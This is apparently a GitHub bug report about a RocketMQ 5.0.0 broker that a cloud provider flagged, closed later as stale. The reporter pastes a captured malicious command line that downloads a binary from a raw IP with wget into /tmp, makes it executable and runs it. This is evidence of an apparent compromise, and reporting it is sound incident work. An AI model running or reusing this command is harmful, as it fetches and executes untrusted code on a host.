[Bug] Service stuck, Alibaba Cloud detected a bug,
Before Creating the Bug Report
-
[X] I found a bug, not just asking a question, which should be created in GitHub Discussions.
-
[X] I have searched the GitHub Issues and GitHub Discussions of this repository and believe that this is not a duplicate.
-
[X] I have confirmed that this bug belongs to the current repository, not other repositories of RocketMQ.
Runtime platform environment
Ubuntu22.04
RocketMQ version
5.0.0
JDK Version
JDK11
Describe the Bug
sh -c $@|sh . echo cd /tmp; wget -O /tmp/ls http://95.214.27.9:8237/base/ls1; chmod 777 /tmp/ls; /tmp/ls china;/bin/startfsrv.sh -c ../conf/broker.conf -n 127.0.0.1:9876
Steps to Reproduce
-[897306] /bin/sh ./mqbroker -c ../conf/broker.conf -[897310] sh /opt/rocketmq-all-5.0.0-bin-release/bin/runbroker.sh org.apache.rocketmq.broker.BrokerStartup -c ../conf/broker.conf -[897334] /opt/jdk-11.0.21/bin/java -server -Xms256m -Xmx256m -Xmn128m -XX:+UseG1GC -XX:G1HeapRegionSize=16m -XX:G1ReservePercent=25 -XX:InitiatingHeapOccupancyPercent=30 -XX:SoftRefLRUPolicyMSPerMB=0 -XX:+UseG1GC -XX:G1HeapRegionSize=16m -XX:G1ReservePercent=25 -XX:InitiatingHeapOccupancyPercent=30 -XX:SoftRefLRUPolicyMSPerMB=0 -Xlog:gc*:file=/dev/shm/rmq_srv_gc_%p_%t.log:time,tags:filecount=5,filesize=30M -XX:-OmitStackTraceInFastThrow -XX:+AlwaysPreTouch -XX:MaxDirectMemorySize=15g -XX:-UseLargePages -XX:-UseBiasedLocking -Drocketmq.client.logUseSlf4j=true -cp .:/opt/rocketmq-all-5.0.0-bin-release/bin/../conf:/opt/rocketmq-all-5.0.0-bin-release/bin/../lib/*: org.apache.rocketmq.broker.BrokerStartup -c ../conf/broker.conf
What Did You Expect to See?
reason
What Did You See Instead?
no
Additional Context
No response
What is your problem?
This issue is stale because it has been open for 365 days with no activity. It will be closed in 3 days if no further activity occurs.
This issue was closed because it has been inactive for 3 days since being marked as stale.